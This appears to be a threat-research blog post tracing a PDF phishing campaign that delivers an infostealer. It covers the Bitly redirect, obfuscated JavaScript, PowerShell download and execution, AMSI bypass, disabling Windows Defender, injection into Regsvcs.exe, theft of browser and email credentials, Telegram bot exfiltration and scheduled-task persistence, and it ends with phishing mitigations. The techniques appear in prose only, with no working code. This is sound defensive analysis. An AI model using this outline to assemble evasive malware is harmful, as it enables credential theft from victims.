When Microsoft implemented macro-blocking safeguards for Internet-delivered Office files, threat actors were forced to create other means for distributing malware over email. PDF files are vulnerable to exploitation due to their complicated structure, making it difficult to discover malicious content within them. PDFs, a popular file type delivered via email attachments in the consumer realm, provide an appealing opportunity for attackers to trick consumers into believing they are harmless. Exploiting this trust, attackers can easily create PDF-based malware, which frequently contains payloads hosted on rogue websites. These PDFs download the hosted payload when the user interacts with them, such as by clicking a link, which increases the potential of infection.

Infection Chain

This new infection chain, which includes Malware, begins with an email that has a PDF attachment, which then enables the transmission of the ultimate payload. In the obsolete and unpatched version of Acrobat Reader, PDFs use MSHTA to execute embedded JavaScript, which then launches PowerShell, allowing for process injection. In contrast, PDFs cannot directly execute JavaScript in the most recent version of Acrobat Reader. Instead, they send you to a rogue website from which the script is downloaded. The subsequent procedure is consistent with the previous example. The kill chain for the delivery of Malware is as follows:

Initial Access

First, we’ll look at the scenario involving the new version of Acrobat Reader, as the majority of users are likely to have it installed. Typically, these PDF files are disguised as bills with a large download button, warnings requiring immediate action, or links designed to redirect users to seemingly benign destinations.

An embedded URL and some hex data find within one of the seven items after looking at the PDF’s internal structure. Malicious links are hidden by attackers using mostly Bitly URLs, which makes them more difficult to find. This is particularly helpful in phishing tactics, which deceive users into divulging personal data. Attackers can alter their locations thanks to Bitly’s dynamic links, which improves their ability to avoid discovery. Furthermore, hackers take use of Bitly’s reputation for trust in order to increase the effectiveness of their social engineering schemes.

The user is sent to the website after approving the redirection. Consequently, an effort is made to pass for a genuine related website. Microsoft Defender SmartScreen warns the user of the potentially dangerous content on this website. A JavaScript file quickly download when entering the website. In an attempt to trick readers into opening the PDF file, the JavaScript file was purposefully titled exactly the same as the PDF file.

As soon as the download is started, it is immediately redirected to the official original page in order to keep customers from seeing anything fishy. The user’s system stores the downloaded file in the Downloads folder. The JavaScript file’s content is extensively disguised. Attackers frequently use this strategy to hide their code, making analysis more difficult and allowing them to avoid discovery.

Execution

Process tree create when the JavaScript was run. An attempt was attempted to access the xml file on infected web page using the PowerShell command line. Invoke-Expression (iex) was then used to execute the file. In this case, the attackers used the PowerShell command line’s replace command to try and obscure the Invoke-Expression (iex) command. The implementation of a sleep command resulted in a 5-second pause in execution, as can be seen in the command line.

The code creates registry entries for persistence after circumventing the Microsoft Windows Anti-Malware Scan Interface (AMSI) scanning by setting a specified value. Additionally, the script defines methods for interacting with the memory of the system and configures global error action settings to conceal errors silently. It first determines whether the type AMSIReaper already exists, and if not, it defines it with a number of declarations for using the Windows kernel32.dll, including functions for manipulating process memory.

In addition, the script carries out a number of nefarious deeds meant to undermine the system’s security. To effectively avoid detection for these objects, it starts with adding exclusions for particular file extensions, routes, and processes in Windows Defender. Then, it makes an effort to modify a number of Windows Defender choices, including turning off important security capabilities like the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, as well as modifying settings pertaining to threat actions and reporting. To further erode the system’s defenses, the script also attempts to change registry settings related to User Account Control (UAC) and turn off the Windows Firewall. Finally, it adjusts the global error action preference to continue, which may hide any errors that arise while the script is running and make sure its harmful actions are not noticed. All things considered, these activities point to a deliberate attempt to undermine system security and possibly open the door for more hostile activity.

Privilege Escalation

Following a short sleep, the script uses the decoded content—to load an assembly and uses reflection to carry out a command.

Process Injection

One file in Data is a .NET DLL. Data is injected into the Regsvcs.exe process as a payload by this DLL. The setup of data that is masks it as a genuine McAfee package file. But it isn’t backed up by a legitimate certificate, which means it is fake. The executable file is highly obfuscated, making much of its content unintelligible. There are several techniques, all of which have meaningless names a purposeful ruse used to prevent researchers from doing their work.

Discovery

The obfuscation procedure has been expertly planned by the attackers. A set of instructions is used to decrypt each string, passing particular parameters in order to extract the material that has been decoded. This painstaking method is intended to obstruct simple analysis and add further layers of intricacy. All of the browsers that the virus questioned are visible in the ProcMon logs.

Credential Access

Moreover, it pilfers private data, including cookies, browser history, credentials, SMTP details, session information, and email client data, including Otlook profiles.

Exfiltration

You can discover the domain it was using for exfiltration by debugging the code. The URL used for exfiltration is displayed. Telegram Messenger owns the DNS record for IP address. Telegram bots are utilized by this kind of malware for data exfiltration because of a number of beneficial aspects. First off, Telegram offers strong end-to-end encryption, guaranteeing the safety of data that is sent. Second, the platform gives bot developers anonymity, which makes their nefarious activity more covert. Thirdly, attackers and their command-and-control system can communicate more easily because to Telegram’s intuitive UI. Furthermore, traffic to Telegram’s servers may seem less suspicious than to other channels due to its widespread use as a messaging platform, which can help avoid detection. Furthermore, Telegram’s robust infrastructure makes it a dependable choice for keeping lines of communication open even during takedown attempts. All things considered, Telegram bots are a desirable option for Malware’s data exfiltration strategies because of their security, anonymity, simplicity of usage, stealth, and robustness. And in order to do this, it connects to the relevant website linked to the bot and sends the data, which is thereafter recorded by a unique bot ID.

To put it briefly, this script’s tasks included decoding the payload, finding legitimate .NET executable paths, executing the malware through process injection, gathering information, and finally exfiltrating it.

Persistence

The way this script creates persistence is by: constructing an HTA script to carry out remotely obtained PowerShell instructions. The script uses ActiveX objects and JavaScript code to carry out commands. In particular, it launches a WScript.Shell instance to execute a PowerShell command that is retrieved from a remote location.

It uses Register-ScheduledTask to register a scheduled task. The task is programmed to start once at a specified time, which is determined by multiplying the current time by a predetermined number of minutes.

Finally, it creates a registry item at HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, the run key for the current user. This registry variable is set up to manually start the scheduled task created in the previous step by running the command schtasks /run /tn $taskName. Since registry value is set to some value of time the script will run once more after defined of minutes.

Following the MSHTA startup, a PowerShell instance is launched, starting the process injection of malware and Regsvcs.exe. Therefore, if you are using an outdated and unpatched version of Acrobat Reader, you don’t even need to interact with the PDF; just opening the file will cause the virus to infect your system.

Summary

The distribution of a PDF file with harmful content sets off a series of events. When the PDF is opened, the malicious code buried within causes a JavaScript payload to be executed, which in turn causes a PowerShell script to be downloaded and run. The malware payload is then injected into genuine processes via this PowerShell script, which decrypts and runs a binary in the form of a.NET DLL file, in order to avoid detection. The malware interacts with command-and-control servers in order to stealthily transfer private information using Telegram bots. In order to continue its presence on the compromised system, the virus creates registry entries and scheduled activities that enable it to run on a regular basis. When a PDF was opened in the previous iteration of Acrobat Reader, malicious JavaScript would automatically launch and inject malware into Regsvcs.exe using PowerShell.

Mitigation

Being watchful and circumspect is necessary to prevent falling for email phishing. The following standard procedures can assist in avoiding becoming a victim of email phishing:

  • Check the Sender Information
  • Consider Before Clicking on Warnings and Links
  • Verify for Grammar and Spelling Mistakes
  • Watch What You Send in Emails and Double-Check Any Odd Requests
  • Employ spam filters for emails.
  • Verify Secure HTTP Connections
  • Eliminate Dubious Emails
  • Update your security software and Windows.
  • Make use of the most recent, patched version of Adobe Reader.